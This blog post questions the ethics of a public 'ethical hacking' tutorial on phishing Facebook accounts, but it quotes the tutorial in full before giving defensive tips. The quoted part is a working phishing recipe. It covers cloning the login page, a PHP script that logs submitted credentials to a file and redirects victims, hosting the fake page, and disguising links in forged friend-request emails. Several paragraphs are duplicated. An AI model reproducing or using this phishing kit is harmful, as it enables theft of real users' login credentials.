Recently I came across an article entitled” How to Hack Facebook Account using phishing web page?” This article took me by surprise, I never thought that such articles would be posted for the public to see and to follow such practices. Before I proceed explaining the step by step process of hacking into the Facebook account by phishing the web page, I would like to explain what phishing is. Phishing a webpage is creating a webpage which looks like the original website. By creating a Phishing WebPage, one can make users believe that it is the original website and enter their id and password.
Go to Facebook.com
Right click on the white space of the front page. Select "View Page source".
Copy the code to Notepad.
Step 2:
Now find (Press ctrl +f) for "action=" in that code.
You fill find the code like this:
You fill find the code like this:
As seen in the picture above one has to change the circled word "action" to "next.php" '. After you have done that, you should change the method to "get" instead of "post", or else it will not work. Save the document as index.htm
Step 3:
Now we need to create the "next.php" to store the password. To do this,open the notepad and type the following code:
<?phpheader("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 4:
Open the notepad and save the file as " pswrds.txt" without any contents.
Then upload those three files- (index.html, next.php, pswrds.txt) in any subdomain Web hosting site. The web hosting service should have the php feature. One can choose any of these sites :110mb.com, spam.com justfree.com or 007sites.com.
Step 5:
Create a Facebook account with keywords like facebook@hotmail.com, facebook_welcome@hotmail.com
Step 6:
Copy the original Facebook invitation and paste it in your mail
Remove the hyperlink from this http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
For this step basically when someone adds you as a friend on Facebook, just copy that mail and paste in compose mail. In that , one will be able to find this link http:/www.facebook.com/n/?reqs.php . Just delete the link from this but mark it and create link with same text but link to your site.
For this step basically when someone adds you as a friend on Facebook, just copy that mail and paste in compose mail. In that , one will be able to find this link http:/www.facebook.com/n/?reqs.php . Just delete the link from this but mark it and create link with same text but link to your site.
"Add the hyperlink button in the red circle and your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php but this leads to your phisher page. (http://www.breakthesecurity.com/2010/11/how-to-hack-facebook-account-using.html)
The title of the page reads" Ethical Hacking Tutorials". Is this considered ethical? The Internet as a media is shaping the values and outlooks of children. The vast array of information has become a source of trouble for children. The knowledge acquired is marvelous and unique, however it has to be used in the right way by people. The Internet also serves as a positive learning and teaching tool. It provides ways to prevent and protect from Facebook Phishing attack :
1) " Follow the Sophos Blog" - They are reports on the latest Facebook phishing scams in a blog called Naked security. The blog is one of the best sources today when it comes to Facebook scams. There are stories and articles raising awareness to the public about the different experiences and happenings of Facebook phishing scams
2) BitDefender Safe Go- Safe Go is a Facebook application developed by BitDefender which is designed to keep users aware and protected from scams on Facebook. SafeGo scans the user's profile for suspicious links and also has an option to automatically post on one's wall when a threat is detected.
3) Facebook Security- Another way of being safe on Facebook comes directly from the source itself - " Facebook Security Page". The Facebook Security Page is constantly being updated to protect the user's account.
2) BitDefender Safe Go- Safe Go is a Facebook application developed by BitDefender which is designed to keep users aware and protected from scams on Facebook. SafeGo scans the user's profile for suspicious links and also has an option to automatically post on one's wall when a threat is detected.
3) Facebook Security- Another way of being safe on Facebook comes directly from the source itself - " Facebook Security Page". The Facebook Security Page is constantly being updated to protect the user's account.
4) Look for the Signs- Aside from all the technical ways one can protect their Facebook account is by being more alert. See who has posted on your wall and why would they share something beginning with " OMG you wont believe this!" If you receive emails that claim to be from Facebook, make sure to analyse and evaluate the email address they came from. Facebook notifications always come from Facebookmail.com. If you feel that your Facebook account has been phished, the first thing to do is change your password. You can even change your privacy settings on Facebook to make sure your account is safe.
References:
No comments:
Post a Comment